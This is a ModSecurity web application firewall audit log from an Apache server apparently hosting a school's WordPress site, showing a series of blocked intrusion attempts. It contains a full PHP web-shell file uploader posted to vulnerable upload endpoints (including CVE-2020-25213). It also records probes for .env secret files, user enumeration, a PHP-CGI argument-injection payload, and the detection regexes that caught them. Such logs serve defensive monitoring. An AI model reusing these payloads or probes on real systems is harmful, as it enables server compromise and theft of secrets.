=TitaniumExV1.php&=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --1f06161e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f06161e-E-- --1f06161e-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747689968648150 2601 (- - -) Stopwatch2: 1747689968648150 2601; combined=793, p1=466, p2=295, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f06161e-Z-- --2bebe029-A-- [20/May/2025:04:26:22 +0700] aCuh_m2BM6ll8T8hTXszNAAAAEc 103.236.140.4 59182 103.236.140.4 8181 --2bebe029-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --2bebe029-C-- 
Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --2bebe029-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bebe029-E-- --2bebe029-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [t Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747689982722911 2530 (- - -) Stopwatch2: 1747689982722911 2530; combined=730, p1=472, p2=229, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bebe029-Z-- --fb1a8253-A-- [20/May/2025:04:26:29 +0700] aCuiBfjdRvl4szSJA_YiHAAAAJg 103.236.140.4 59522 103.236.140.4 8181 --fb1a8253-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=e1545d13e973dd465c1823c143553766 --fb1a8253-C-- --e1545d13e973dd465c1823c143553766 Content-Disposition: form-data; name="cmd" upload --e1545d13e973dd465c1823c143553766 Content-Disposition: form-data; name="target" l1_Lw --e1545d13e973dd465c1823c143553766 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --e1545d13e973dd465c1823c143553766-- --fb1a8253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb1a8253-E-- --fb1a8253-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747689989810490 3446 (- - -) Stopwatch2: 1747689989810490 3446; combined=2195, p1=431, p2=1735, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb1a8253-Z-- --0fc9494c-A-- [20/May/2025:04:30:10 +0700] aCui4m2BM6ll8T8hTXs1-QAAAEo 103.236.140.4 39262 103.236.140.4 8181 --0fc9494c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.130.38.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.130.38.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0fc9494c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fc9494c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747690210559205 2715 (- - -) Stopwatch2: 1747690210559205 2715; combined=1441, p1=484, p2=925, p3=0, p4=0, p5=31, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fc9494c-Z-- --73234059-A-- [20/May/2025:04:51:23 +0700] aCun2_jdRvl4szSJA_YqyAAAAJE 103.236.140.4 40250 103.236.140.4 8181 --73234059-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.188.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.188.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73234059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73234059-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747691483446227 3079 (- - -) Stopwatch2: 1747691483446227 3079; combined=1327, p1=420, p2=871, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73234059-Z-- --04da275b-A-- [20/May/2025:05:25:28 +0700] aCuv2G2BM6ll8T8hTXtE_AAAAEk 103.236.140.4 39952 103.236.140.4 8181 --04da275b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.108.227.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.108.227.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04da275b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04da275b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747693528492182 2697 (- - -) Stopwatch2: 1747693528492182 2697; combined=1220, p1=400, p2=793, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04da275b-Z-- --6664794a-A-- [20/May/2025:06:23:18 +0700] aCu9ZvjdRvl4szSJA_Y8XQAAAIE 103.236.140.4 59420 103.236.140.4 8181 --6664794a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6664794a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6664794a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747696998871634 800 (- - -) Stopwatch2: 1747696998871634 800; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6664794a-Z-- --da8d3542-A-- [20/May/2025:06:23:22 +0700] aCu9asXP1sKBAOnOfYPsZgAAAM8 103.236.140.4 59492 103.236.140.4 8181 --da8d3542-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --da8d3542-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da8d3542-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747697002645562 794 (- - -) Stopwatch2: 1747697002645562 794; combined=354, p1=317, p2=0, p3=0, p4=0, p5=36, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da8d3542-Z-- --0a56a42f-A-- [20/May/2025:06:35:19 +0700] aCvAN4Kffmi-VC_l8kQfFgAAAAU 103.236.140.4 42882 103.236.140.4 8181 --0a56a42f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.117.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.117.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0a56a42f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a56a42f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747697719948076 6130 (- - -) Stopwatch2: 1747697719948076 6130; combined=4165, p1=1094, p2=3039, p3=0, p4=0, p5=32, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a56a42f-Z-- --2bfe406f-A-- [20/May/2025:06:59:46 +0700] aCvF8sXP1sKBAOnOfYP06QAAAMc 103.236.140.4 40218 103.236.140.4 8181 --2bfe406f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.75.37.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.75.37.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2bfe406f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bfe406f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747699186481153 4018 (- - -) Stopwatch2: 1747699186481153 4018; combined=1994, p1=589, p2=1372, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bfe406f-Z-- --2b36b67e-A-- [20/May/2025:07:17:47 +0700] aCvKK4Kffmi-VC_l8kQqzgAAABY 103.236.140.4 60102 103.236.140.4 8181 --2b36b67e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.41.83.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.41.83.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2b36b67e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b36b67e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747700267533694 3122 (- - -) Stopwatch2: 1747700267533694 3122; combined=1371, p1=529, p2=816, p3=0, p4=0, p5=26, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b36b67e-Z-- --1b6d9f37-A-- [20/May/2025:07:23:57 +0700] aCvLnW2BM6ll8T8hTXtdEgAAAEA 103.236.140.4 38260 103.236.140.4 8181 --1b6d9f37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.211.13.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.211.13.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1b6d9f37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b6d9f37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747700637636598 3546 (- - -) Stopwatch2: 1747700637636598 3546; combined=1806, p1=564, p2=1214, p3=0, p4=0, p5=28, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b6d9f37-Z-- --c065bd10-A-- [20/May/2025:07:50:50 +0700] aCvR6sXP1sKBAOnOfYMCXAAAAM0 103.236.140.4 36608 103.236.140.4 8181 --c065bd10-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.119.87.58 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.119.87.58 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --c065bd10-C-- --c065bd10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c065bd10-E-- --c065bd10-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747702250568732 6626 (- - -) Stopwatch2: 1747702250568732 6626; combined=4997, p1=487, p2=4477, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c065bd10-Z-- --2389cc62-A-- [20/May/2025:08:30:58 +0700] aCvbUsXP1sKBAOnOfYMMoAAAAM0 103.236.140.4 49056 103.236.140.4 8181 --2389cc62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.176.138.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.176.138.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2389cc62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2389cc62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747704658025954 2813 (- - -) Stopwatch2: 1747704658025954 2813; combined=1559, p1=518, p2=1011, p3=0, p4=0, p5=30, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2389cc62-Z-- --cd6e2106-A-- [20/May/2025:08:40:36 +0700] aCvdlPjdRvl4szSJA_ZkyAAAAJY 103.236.140.4 60364 103.236.140.4 8181 --cd6e2106-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cd6e2106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd6e2106-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747705236875196 846 (- - -) Stopwatch2: 1747705236875196 846; combined=360, p1=322, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
